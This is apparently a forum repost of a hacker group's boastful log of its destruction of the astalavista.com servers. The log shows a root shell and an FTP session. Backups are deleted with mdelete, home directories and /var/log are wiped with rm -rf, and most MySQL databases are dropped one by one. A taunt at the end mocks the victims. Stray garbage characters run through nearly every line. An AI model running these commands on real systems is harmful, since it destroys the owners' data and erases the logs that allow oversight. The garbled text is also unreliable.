226 Transfer complete./ @3 j% Z) `' w
ftp> cd astalavista.com
/ d* Z" y" u g# ^" v0 j% }250 CWD command successful.8 F: _5 S# d2 l+ j
ftp> ls -la
- \( Q+ q& O! v, {, x9 U. P" N227 Entering Passive Mode (212,254,194,163,2,189)5 d9 A$ ]3 E/ T& F5 C/ u) w
150 Opening BINARY mode data connection for ‘file list’.& ^, L, l( _% t p: N6 Y
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
1 z' [( I3 G$ Y, F2 C-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2& P* O% w, F1 C4 |
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2' l) v; C4 ^3 \9 B% h% a0 K! o
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar) r4 I& A& c( x% y; [
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
, `' a% T- D. a+ {: _5 B; q[snip]4 [0 i0 j# j% H0 I# Y6 Q! V ~
226 Transfer complete.
) I' }+ c; x4 \ftp> mdelete *
) C: g! O% H. v& g7 {ftp> ls -la
" f8 m8 {% V2 l0 m227 Entering Passive Mode (212,254,194,163,2,193)+ t1 O3 b! j4 I+ R* X& n! y9 E) @
150 Opening BINARY mode data connection for ‘file list’.1 D5 w# ~* d, W+ F+ }% r% Z4 x
226 Transfer complete.
* b) s( i9 X% R* U" g7 ~ftp>
g. i9 R: f1 N. a5 K/ i3 r! W" j) @, h
sh-3.2# cd /home1 d" e& i+ c# F, x
sh-3.2# ls -la" M; E0 E0 v' {" z4 j
total 120
& _1 [* b! R! o# z' Odrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
# x* x, u" y9 J6 T' U* w; l$ i0 rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..3 k: g( w$ N% }6 T0 }& I V
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin1 c: ?5 T0 O" H
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
! B& r2 P, {; o; y/ `2 S/ {( e$ U3 C-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# K+ w4 W) Z, j) R0 p3 \
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet4 Y- F) x% J, K* J/ C- D
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup& ^2 t$ G* c) j' [$ ?; {# e
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
% w/ ~# n# E) Mdrwx–x–x 10 com com 4096 Apr 28 12:40 com% k& i$ z, A# ?" Q
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 P4 f1 G) T- T7 m+ J* Jdrwx—— 3 jon jon 4096 Sep 21 2007 jon
! z2 h, e4 k# i9 x% vdrwx—— 2 root root 16384 Sep 11 2007 lost+found) V, o; D. h2 o9 ^% J. @
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
f7 i. i) E& Idrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& g" z2 d; M0 {6 Y8 U) c1 G0 |drwx—— 2 jon jon 4096 Sep 15 2007 test5 I8 W3 n; Q2 U3 }: S' [# i7 G
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& W: G! ]* p1 R% b' u
7 g5 N& A9 W/ esh-3.2# rm -rf backup/
; W; C/ E8 W8 w% h! W8 F7 osh-3.2# rm -rf backup.14161/
) J$ D4 y% { |+ |sh-3.2# rm -rf ftp/
% H9 }. c! i% X- j. y$ W6 wsh-3.2# rm -rf jon/- N9 C9 M3 Z" ~" B5 ~
sh-3.2# rm -rf my/
5 Z1 N) J) J1 u" c; i" e/ Z9 Psh-3.2# rm -rf mysqldata/
$ O# x# c. I' ish-3.2# rm -rf test/. C0 S2 W- r! r: ~9 s- Q8 r& }
sh-3.2# rm -rf tmp/ M" w# Q. B$ b3 M% }" s9 {
sh-3.2# cd ~5 U- g7 Q4 ^9 t1 U* l
sh-3.2# rm -rf *6 D* E: X. t* o8 Z% f9 U( u
sh-3.2# rm -rf /var/log/
% [) r- j4 @8 G+ G- b- A2 _& brm: cannot remove directory `/var/log//proftpd’: Directory not empty
- ~% Q; l2 `* |. u4 o1 |% L6 C0 @sh-3.2# rm -rf /home/*
/ h+ O2 j, {# L4 G" Y: Ysh-3.2# mysql
6 p* d5 B* V2 ?4 GWelcome to the MySQL monitor. Commands end with ; or \g.5 o1 D! |. e, y0 e& O! [9 p+ b# L/ w
Your MySQL connection id is 407156
: m: {, M, ]( M }5 B! A* QServer version: 5.0.45-community-log MySQL Community Edition (GPL)
8 Q4 O+ l/ _! H4 x3 l9 b7 k& }7 a) [2 | j1 k+ T T
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 ]+ T b/ n. J: [/ M `" i; D, u2 H8 h3 L
mysql> show databases;6 z5 A6 m. ^0 W9 B! \0 `" f
+———————–+7 k" f: w4 }( b# X( k! ~6 L
| Database |5 U( }- _0 h l9 z
+———————–+
! O; i8 A& v- c* c% x| information_schema |
. {% I9 r0 {0 d- G| astanet_ads |! `# W/ O! t& x" ]! r: Z5 c$ \. a
| astanet_mailing_lists |, h) K' U2 V& H) l0 v2 f# b
| astanet_mediawiki |
+ X- \. ~. i$ g8 W1 d| astanet_membersystem |
$ E5 A* _+ F [# j0 P$ m| com_contrexx |5 A3 |1 _7 [- Q
| com_contrexx2 |9 m3 q3 a' ?8 [/ B
| com_contrexx2_live |
1 S# w, r& A) c5 f. k# c$ b| da_roundcube |, T, _5 N: k6 Z- K6 W) \9 _; ^
| dolphin |
$ @' x$ C6 w' q3 F| ideapool |% i- k; G( J0 M8 @5 G
| mysql |
" S% [5 U. I- E2 K( X8 q| test |
: k; t: o' V' X$ n0 P- H8 j| yourmaster |
& ^+ Z, _9 W" x) \+———————–+
6 O$ [3 h3 F; ^/ j14 rows in set (0.03 sec)
1 d0 p; {5 Q0 M, Z, i& g9 M$ q& l( [; s, L4 i# _! t" ^
mysql> drop database astanet_membersystem;
, @2 Q: f' g. o. J) S' gdroQuery OK, 46 rows affected (0.81 sec)
: G" x: a0 i9 r: {2 H% K9 I% r
6 s$ U4 l2 A# D! ~6 U" W0 rmysql> drop database com_contrexx;
. y* m' J2 C8 [/ y* ]0 GQuery OK, 211 rows affected (2.72 sec)
. H8 q9 q2 D: H- t' o1 b
; Q# J3 E& q2 s( r+ N9 dmysql> drop database com_contrexx2;
. v' [9 i$ z! y4 x% e: ~& K, z* ^7 j( YQuery OK, 237 rows affected (2.23 sec)# h% R7 ^/ o! @/ W; M! }
7 @/ k4 U0 ^+ y; j# }$ Bmysql> drop database com_contrexx2_live;; a, W2 l# p7 ?; o; ` e
Query OK, 227 rows affected (7.63 sec). \- h+ M8 {7 S7 y4 l( k2 w
( i; y, R0 S/ ^: Z% Q5 t9 Fmysql> drop database ideapool;' `" O' I2 Z7 N
Query OK, 69 rows affected (0.19 sec)1 |5 `/ f E9 N( b! n+ X$ T9 u: P
, c7 R4 ^. J0 L2 Z* v1 q3 @; O) C
mysql> drop database yourmaster;
* c; C: {1 [8 b$ }( O4 ]Query OK, 158 rows affected (0.55 sec). h- f6 }# F: w7 Y
[7 t2 Z& f: N9 T. P# C
mysql> drop database astanet_ads;
$ H5 Z- [* S% b& J7 @2 I. WQuery OK, 9 rows affected (0.11 sec)
1 C. z9 q' l- g% P M
& ^9 h9 U5 L1 L5 b6 I" imysql> drop database astanet_mailing_lists;
9 r3 Z3 @5 q, a v5 YQuery OK, 24 rows affected (1.47 sec)
/ ^( k0 Z! p- k8 d
0 t( x" {+ Z% ]( p) A5 k. S% xmysql> drop database astanet_mediawiki;) s- M' p: M A4 i3 q9 A0 G, z! q
Query OK, 31 rows affected (0.51 sec)
& R! y$ y) }1 P% F, m
3 O: L* f4 L* E1 ?7 q! Q! u xmysql> show databases;: k8 y, p7 {2 Q
+——————–+" ^" g/ d1 J- I% W% D( L
| Database |* }2 H& E2 r* J
+——————–+
& f8 ]( C4 }9 v% W" n, ?| information_schema |; n6 h2 @ G( l$ @3 a# A8 ~! { U8 I7 O
| da_roundcube |
/ j% F% q3 M3 l7 E9 Q2 j+ Z2 }| dolphin |) W h1 K! j7 K: x5 r
| mysql |
8 Q- o1 ?# N: @4 A0 o| test |
5 i# t( C$ U3 @+——————–+( v8 B6 C. S6 f1 ^4 S
5 rows in set (0.00 sec)
! T; Z9 G; W# {6 Y0 s7 F! O- g
. Q* h& l( W S s8 t; F! ]What a journey! We’re not sure exactly why the “Terminator” had any influence on' _9 G. q; J9 f; `1 R* H
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
) A- `0 X; H- L! {. Twrong to say this pack of morons *wont be back*.8 T# V% x, `3 {# }* r1 D5 W- A. r6 L! V
|
发表于 2012-11-6 21:07:34
收藏
支持
反对